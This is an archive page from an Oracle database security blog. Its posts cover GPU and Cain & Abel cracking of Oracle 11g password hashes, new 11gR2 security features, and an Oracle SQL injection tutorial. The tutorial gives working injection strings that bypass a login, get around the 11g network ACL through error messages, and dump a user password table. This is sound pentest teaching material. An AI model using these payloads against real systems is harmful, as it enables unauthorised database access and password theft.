Mai 2012
M	D	M	D	F	S	S
« Mrz
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

Archiv der Kategorie 11g

IGHASHGPU - Cracking Oracle Passwords with 790 Million Passwords/second

29 Nov 2009 von Alexander Kornbrust.

This time I want to present a new super-fast password cracker.Ivan Golubev released a new version of his password cracker IGhashGPU. I know the tool for a while but in older versions of IGHASHGPU Oracle SHA1 passwords were not supported.

The new version 0.62 supports now also Oracle 11g hashes (SHA1 + salt). The remarkable thing is the speed of cracking passwords. Ivan’s cracker is using the GPU for cracking the passwords. Without a GPU (NVidia or ATI) or within a virtual machine the tool is not working.

On a dual ATI 5970 configuration (forum entry) the tool can crack approx. 790 (!!!) Million hashes per second. A single ATI 4850 can achieve more than 300 Mill. hashes per second. This means that the new 11g password algorithm can be cracked approx 130 times faster than the old DES algorithm. I am not sure if it was a good idea from Oracle to use such a standard algorithm like SHA1 because this is together with MD5 one of the most optimized algorithms.

Here is a short comparison between cracking old Oracle DES based passwords and new Oracle 11g SHA1 based passwords. I used the fasted software BF password cracker for Oracle DES (Repscan from Red-Database-Security or woraauthbf, both with approx. 6 Mill hashes on a Core i7) and compared it with the configuration of running IGHASHGPU on a dual 5970 configuration (790 Mill hashes per second).

Here are some benchmark numbers. I know that 11g supports case sensitive passwords but from my experience most people use normally lowercase passwords with the first character converted to uppercase.In such a case it is not necessary to crack the entire key space.

26 characters, length 6: DES: 53 seconds, SHA1: 0.4 seconds

26 characters, length 7: DES: 23 min, SHA1: 10 seconds

26 characters, length 8: DES: 10 h, SHA1: 4.6 minutes

26 characters, length 9: DES: 11 days, SHA1: 2 hours

26 characters, length 10: DES: 283 days, SHA1: 2 days

If you are interested to download the tool you can get it from here.

Geschrieben in Tools, 11g | Drucken | 2 Kommentare »

New Security Features Oracle 11g Release 2

1 Sep 2009 von Alexander Kornbrust.

Here are the New Features Oracle 11g Release 2.

Enhancements to the Audit Trail Cleanup Process
(Oracle has added several enhancements to the audit trail cleanup process, e.g. set maximum size and age for os audit trails, mobe audit trail from SYSTEM tablepace, purge audit trail records in one operation or purge job, timestamp audit trail records based on their archive date)
Enhancements to Directory Objects
(Execute Privilege for Directory Objects. Since Oracle 11.1.0./10.2.0.5 it is possible to run OS commands via external tables. This privilege allows to restrict the execution of OS commands.
Auditing of directory objects “AUDIT EXECUTE ON DIRECTORY rds_dir BY ACCESS;”)
Enhancements to Fine-Grained Access to External Network Services
(utl_http supports azon Simple Storage Service (S3) scheme,
support for IPv6)
Global Application Contexts Available Across Oracle RAC Instances
Secure Sockets Layer (SSL) Version 2 Support Change
(SSL is no longer included in the default list of default supported protocols)
Tablespace Master Key Rekey: Changing the Encryption Key Password
(To fullfil the PCI DSS requirements it is now possible to rotate the encryption key)

Some features are deprecated with this version of Oracle:

DB_EXTENDED Setting for the AUDIT_TRAIL Parameter Deprecated
(instead use the DB,EXTENDED string)
WKUSER Role and Ultra Search Schemas Deprecated
(The WKUSER role and the schemas WKSYS, WKTEST, WKPROXY have been deprecated)
Database Configuration Assistant No Longer Provides Default Security Settings
(Audit options and password policies are automatically added to the database if you use DBCA)
ALTER USER Clause AUTHENTICATED USING PASSWORD Deprecated
(btw “IDENTIFIED BY VALUES is still undocumented, see Oracle documentation)
Password for the listener.ora File Deprecated
(According to Oracle it is no longer needed and will be removed in Oracle 12)

Geschrieben in 11g | Drucken | 3 Kommentare »

Tutorial: Oracle SQL Injection in Webapps - Part I

17 Jan 2009 von Alexander Kornbrust.

This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some security enhancements by default, e.g. the ACL for PLSQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…

First we start with with a vulnerable webapp:

In this webapp we can login to an employee directory. If we try to guess a valid combination, e.g. scott / tiger we are getting an error message

OK, let’s try to use a single quote ‘ as a user login. And BANG - ERROR

“ORA-01756 - Anführungsstrich fehlt bei Zeichenfolge”.

If you do not speak german, you can lookup in google for the english translation of this error message. This is not uncommon to receive an error message in a foreign language (if you work internationally).

There are several website so I take the first finding. The translation is “ORA-01756: quoted string not properly terminated”. This is a common error message of a SQL Injection vulnerability.

A typical SQL Injection string is

‘ or 1=1–

If we use this string, we are getting the following result:

By using ‘ or 1=1– we successfully logged on into the system. But we are interested in the data not in the account of the webapp.

We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.

But what are now the next steps?

1. Enumeration of the database:
Let’s find out the version number of the Oracle database:

Now we try to inject the following command in the login field

‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

Again an ORA-01756 error. This time it is a different problem. The field for the login is limited to 50 characters but our string we are injecting is longer. That’s why we are converting the POSTs to GETs.
The webdeveloper plugin for firefox can do this (+ many other different ways like saving the webpage locally, removing restrictions online, …).

After doing the conversion from POSTs to GETs we can modify the injected string in the URL:

Again we are getting a german error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.

A quick lookup shows the english translation:

ORA-24247 network access denied by access control list (ACL)

OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.

I was looking for an alternative and I found the following function :
ctxsys.drithsx.sn

So we replace utl_inaddr with ctxsys.drithsx.sn (+ and one additional parameter).

Our new injection is looks like:

‘ or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–

After injection this we are getting the following error message

ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production ist nicht vorhanden

The error message contains the Database version. The reason for this behaviour is our injected string contains the result of the query (select banner from v$version where rownum=1) in the error message. This query returns the first row of v$version.

Injecting error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using the string concatenation || (col1||col2). To bypass the limitation of multiple rows, most pentesters enumerate through the various columns using the rownum.

But Oracle 11g offers a new function: stragg

This functions can convert multiple rows into a single row. In one of the next tutorial I will show how to do this in Oracle 9 and 10. We can now use the function stragg to get all columns in the error message:

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||’ ‘ from v$version))–

Now we have everything to retrieve all data (according to our privileges) from the database

Let’s see what privileges we have

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||’;') from user_role_privs))–

We have CONNECT and RESOURCE role.

The next step is to get all tables with a password column:

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–

There is a table called SHOP.SHOPUSER. We are now using the following command to extract all passwords from this table.

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||’;') from shop.shopuser))–

Using this approach we can retrieve all table content without using UNION SELECT from the table.

SUMMARY of the used injected commands:

‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||’;') from user_role_privs))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||’;') from shop.shopuser))–

Geschrieben in Tutorial, 11g, Oracle Security | Drucken | 3 Kommentare »

New version of cain with support for 11g passwords

14 Dez 2008 von Alexander Kornbrust.

2 weeks ago, Massimiliano Montoro aka Mao, released a new version of Cain & Abel.

Here some of the new features of Cain & Abel v4.9.25:

- Oracle 11g (case sensitive) Password Extractor via ODBC.
- Added Oracle 11g Password Cracker (Dictionary and Brute-Force Attacks).
- Added support for Oracle TNS 11g (AES-192) in Oracle TNS Hashes Password Cracker.
- Added support for Oracle TNS 11g (AES-192) in Oracle TNS sniffer filter.
- Experimental SQL Query tool via ODBC.

Cain Screenshot

The AES implementation of Cain is slower than the implementation of GSAuditor (6,172,839 vs 2,654,719 on a 2.4 GHz C2D E4600) but 2.6 Million passwords per second (via brute force) is still quite fast.

Massimilano wrote also 3 interesting whitepapers about the TNS authentication based on László Tóth work. Instead of using the oran10.dll/oran11.dll Mao is using the OpenSSL library:

Oracle 9i TNS 3DES authentication details
Oracle 10g TNS AES-128 authentication details
Oracle 11g TNS AES-192 authentication details

Geschrieben in passwords, 11g, Oracle Security | Drucken | Keine Kommentare »

Looking Glass and Oracle 11g

11 Apr 2008 von Alexander Kornbrust.

Yesterday I read an article about Apple Quicktime and LookingGlass. I downloaded the free tool from the website of errata security.

Here are the results from a test with Oracle 11.1.0.6 on Windows. I have scanned the Oracle Home and the tool found 518 Oracle files with dangerous functions like strcpy, sprintf, sscanf, strcat, …

The Oracle executable (oracle.exe) for example is using wsprintfA, strncpy, sprintf, sscanf, _vsnprintf, _snprintf, vprintf, strncat, strtok, strlen, strcpy, strcat.

Geschrieben in 11g | Drucken | 1 Kommentar »